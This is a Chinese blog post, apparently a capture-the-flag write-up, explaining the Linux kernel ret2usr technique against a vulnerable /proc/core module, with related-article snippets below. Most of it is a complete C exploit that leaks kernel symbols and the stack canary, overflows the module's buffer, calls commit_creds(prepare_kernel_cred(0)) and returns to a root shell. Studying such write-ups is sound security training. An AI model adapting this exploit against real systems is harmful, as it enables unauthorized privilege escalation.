kernel pwn ret2usr

最新推荐文章于 2024-04-05 19:28:46 发布
最新推荐文章于 2024-04-05 19:28:46 发布
阅读量157 收藏
点赞数
分类专栏: # kernel 二进制漏洞 文章标签: kernel
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46441427/article/details/121199871
版权

思路

通过读取 /tmp/kallsyms 获取 commit_credsprepare_kernel_cred 的方法相同,同时根据这些偏移能确定 gadget 的地址。
leak canary 的方法也相同,通过控制全局变量 off 读出 canary。

但是之后就不同了

rop的构造是执行函数commit_cred(prepare_kernel_cred(0))进行提升权限,通过swapgs; iretq返回用户态执行system_calll
而ret2usr是执行用户态中的commit_cred(prepare_kernel_cred(0)),ret2usr 攻击利用了 用户空间的进程不能访问内核空间,但内核空间能访问用户空间 这个特性来定向内核代码或数据流指向用户控件,以 ring 0 特权执行用户空间代码完成提权等操作。
这个方法其实跟上面所说的ROP基本没有区别,最根本的区别就是把上面所需要rop构造出来的提权过程commit_creds(prepare_kernel_cred(0))直接写了一个函数,从而不需要rop调用,直接调用函数即可。

exploit

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("[*]status has been saved.");
}


void get_shell(void){
    system("/bin/sh");
}

size_t commit_creds = 0, prepare_kernel_cred = 0;
size_t raw_vmlinux_base = 0xffffffff81000000;
size_t vmlinux_base = 0;
size_t find_symbols()
{
    FILE* kallsyms_fd = fopen("/tmp/kallsyms", "r");
    /* FILE* kallsyms_fd = fopen("./test_kallsyms", "r"); */

    if(kallsyms_fd < 0)
    {
        puts("[*]open kallsyms error!");
        exit(0);
    }

    char buf[0x30] = {0};
    while(fgets(buf, 0x30, kallsyms_fd))
    {
        if(commit_creds & prepare_kernel_cred)
            return 0;

        if(strstr(buf, "commit_creds") && !commit_creds)
        {
            /* puts(buf); */
            char hex[20] = {0};
            strncpy(hex, buf, 16);
            /* printf("hex: %s\n", hex); */
            sscanf(hex, "%llx", &commit_creds);
            printf("commit_creds addr: %p\n", commit_creds);
            vmlinux_base = commit_creds - 0x9c8e0;
            printf("vmlinux_base addr: %p\n", vmlinux_base);
        }

        if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
        {
            /* puts(buf); */
            char hex[20] = {0};
            strncpy(hex, buf, 16);
            sscanf(hex, "%llx", &prepare_kernel_cred);
            printf("prepare_kernel_cred addr: %p\n", prepare_kernel_cred);
            vmlinux_base = prepare_kernel_cred - 0x9cce0;
            /* printf("vmlinux_base addr: %p\n", vmlinux_base); */
        }
    }

    if(!(prepare_kernel_cred & commit_creds))
    {
        puts("[*]Error!");
        exit(0);
    }

}


void get_root()
{
    char* (*pkc)(int) = prepare_kernel_cred;
    void (*cc)(char*) = commit_creds;
    (*cc)((*pkc)(0));
    /* puts("[*] root now."); */
}

void set_off(int fd, long long idx)
{
    printf("[*]set off to %ld\n", idx);
    ioctl(fd, 0x6677889C, idx);
}

void core_read(int fd, char *buf)
{
    puts("[*]read to buf.");
    ioctl(fd, 0x6677889B, buf);

}

void core_copy_func(int fd, long long size)
{
    printf("[*]copy from user with size: %ld\n", size);
    ioctl(fd, 0x6677889A, size);
}


int main(void)
{
    find_symbols();
    size_t offset = vmlinux_base - raw_vmlinux_base;
    save_status();

    int fd = open("/proc/core",O_RDWR);
    set_off(fd, 0x40);
    size_t buf[0x40/8];
    core_read(fd, buf);
    size_t canary = buf[0];
    printf("[*]canary : %p\n", canary);

    size_t rop[0x30] = {0};
    rop[8] = canary ; 
    rop[10] = (size_t)get_root;
    rop[11] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
    rop[12] = 0;
    rop[13] = 0xffffffff81050ac2 + offset; // iretq; ret;
    rop[14] = (size_t)get_shell; 
    rop[15] = user_cs;
    rop[16] = user_rflags;
    rop[17] = user_sp;
    rop[18] = user_ss;

    puts("[*] DEBUG: ");
    getchar();
    write(fd, rop, 0x30 * 8);
    core_copy_func(fd, 0xffffffffffff0000 | (0x100));
}
Akura@lan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kernel pwn】(叁)ret2usr
weixin_43960998的博客
03-19 296
继续学习 kernel pwn 相关知识,同时记录一些方法。 本文以 QWB2018-core 为例 1.前置知识 ret2usr 利用了在不开 smep 时,用户空间进程不能访问内核空间,但是内核空间空间可以执行用户空间代码的这一特性。这样的话,就可以不用构造 rop 链,直接在内核空间跳到用户空间的 getshell 的代码上执行,这些 getshell 的代码可以自己编写,最终达到在非 root 用户下提权的目的。 2.题目分析 见 kernel pwn 系列二即可。 3.完整exp #include
Kernel pwn 基础教程之 ret2usr 与 bypass_smep
蚁景网安学院
03-16 474
一、前言 在我们的pwn学习过程中,能够很明显的感觉到开发人员们为了阻止某些利用手段而增加的保护机制,往往这些保护机制又会引发出新的bypass技巧,像是我们非常熟悉的Shellcode与...
linux内核提取ret2usr,Linux内核漏洞利用技术详解 Part 2
weixin_30970539的博客
05-07 384
前言在上一篇文章中,我们不仅为读者详细介绍了如何搭建环境,还通过一个具体的例子演示了最简单的内核漏洞利用技术:ret2usr。在本文中,我们将逐步启用更多的安全防御机制,即SMEP、KPTI和SMAP,并逐一解释它们将如何影响我们的漏洞利用方法,以及如何绕过这些防御机制。启用SMEP机制SMEP简介SMEP(Supervisormode execution protection,SMEP)机制的作...
linux内核提取ret2usr,[原创]Linux内核Ret2dir
weixin_39824191的博客
05-07 227
Linux内核Ret2dir(return-to-direct-mapped memory)论文地址:https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-kemerlis.pdf作者:哥伦比亚大学发表于: USENIX Security(%,计算机安全顶会)The strategy of retur...
老表带你学Linux kernel pwn 入门(一)
weixin_43889007的博客
11-04 3514
不加任何保护机制的内核栈溢出提权
kernel pwn
nelson11112的博客
04-11 3614
比赛中的kernel pwn 比赛中我们会得到下面几个文件 正在上传…重新上传取消 bzImage 这是一个内核编译生成的压缩内核映像 core.cpio这是一个文件管理系统 针对core.cpio会有一系列常规操作 mkdir core cd core mv ../core.cpio core.cpio.gz // cp ../core.cpio core.cpio.gz gunzip core.cpio.gz cpio -idmv < core.cpio 然后我们在core..
【学习札记NO.00004】Linux Kernel Pwn学习笔记 I:一切开始之前
arttnba3的博客
02-25 585
【学习札记NO.00004】Linux Kernel Pwn学习笔记 I:一切开始之前[GITHUB BLOG ADDR](https://arttnba3.cn/2021/02/21/NOTE-0X02-LINUX-KERNEL-PWN-PART-I/)0x00.Linux Kernel Basic Knowledge一、内核内核架构:微内核 & 宏内核(单内核)宏内核(Monolithic Kernel,又叫单内核)微内核(Micro Kernel)二、分级保护域Intel Ring Model
从零开始学逆向:理解ret2libc-3
weixin_44626085的博客
02-20 1504
题目下载链接:https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug 提取码:0000。
从零开始学逆向:理解ret2syscall
weixin_44626085的博客
02-19 1309
链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?​ 3.1 使用ida打开分析 ​gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。
linux内核提取ret2usr,Linux kernel pwn:ROP & ret2usr
weixin_30023527的博客
05-07 259
原标题:Linux kernel pwn:ROP & ret2usr 本文为看雪论精华文章看雪论坛作者ID:T1e9u前言这篇博文是我根据2018年强网杯的core题的利用姿势学习记录的,由于内核pwn相对于用户态的pwn来说复杂很多,而网上记载入门的博客都比较简略,所以这篇博文我会尽可能详细地记录,有错误的点希望师傅们斧正。前置知识内核pwn应该怎么pwn与用户态的pwn不一样,内核pw...
linux内核提取ret2usr,kernel pwn(0):入门&ret2usr
weixin_29079643的博客
05-07 432
一、序言从栈、格式化串,再到堆,当这些基本的攻击面都过下来以后,对于劫持流程拿shell的过程就应该非常熟悉了,然而传统的exploit拿到的shell的权限并非最高的,而kernel pwn的核心目标就是拿到一个具有root权限的shell,其意义就在于提权。二、kernel pwn简介1.一般背景:内核pwn的背景一般都是Linux内核模块所出现的漏洞的利用。众所周知,Linux的内核被设置成...
linux内核提取ret2usr,Linux Kernel Exploit 内核漏洞学习(2)-ROP
weixin_30359265的博客
05-07 247
原标题:Linux Kernel Exploit 内核漏洞学习(2)-ROP 本文为看雪论坛精华文章看雪论坛作者ID:钞sir简介ROP的全称为Return-oriented Programming,主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。这种攻击方法在用户态的条件中运用的比较多,ret2shellcode...
Linux Kernel Exploit 内核漏洞学习(2)-ROP
热门推荐
钞sir的博客
08-05 1万+
简介 ROP的全称为Return-oriented Programming,主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程;这种攻击方法在用户态的条件中运用的比较多,ret2shellcode,ret2libc,ret2text等ret2系列都利用到了ROP的思想,当然这种攻击手法在内核态同样是有用的,并且手法都基...
Linux内核 防御机制分析_内核栈保护机制,网络安全入门
最新发布
m0_61418075的博客
04-05 796
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
一步一步学ROP——shellcode和ret2libc
weixin_42390670的博客
07-23 1211
序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的学好ROP还是得从基础的x86系统开始,但看官请不要着急,在随后的教程中我们还会带来linux_x64以及android (arm)方面的ROP利用方法。 1 C...
适合新手的ret2libc3之路
Vicl1fe的博客
05-29 3928
rop之libc3 做了一下这道题,感觉收获蛮大,写一篇博客,也方便自己记忆。 题目链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#3 参考链接:https://www.jianshu.com/p/5525dde00053 好了回归正题,首先拿到这个题目,ida打开按f5查看伪代码,看到了高危函数...
缓冲区溢出漏洞-基本ROP-ret2lib
weixin_34114823的博客
04-16 866
本文视频: 如果文字过于枯燥,可观看在线视频:https://edu.51cto.com/sd/16514基础知识:第一题:ret2libc1我们先用IDA分析下有一个gets函数会有溢出漏洞,我们在查看下程序的有哪些保护可以看到开启了NX,说明我们在栈中的数据没有执行权限,我们需要使用ROP方式进行绕过我们使用gdb的pattern进行测试溢出偏移量是112...
利用ret2libc绕过DEP安全机制
_wells的博客
03-29 1169
文中的例子是引用了别人的,计作转载吧,具体哪里引用的忘记了数据执行保护:           DEP就是将非代码段的地址空间设置成不可执行属性,一旦系统从这些地址空间进行取指令时,CPU就是报内存违例异常,进而杀死进程。栈空间也被操作系统设置了不可执行属性,因此注入的Shellcode就无法执行了     导向系统库函数执行(ret2libc)攻击方法:        系统函数库(
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值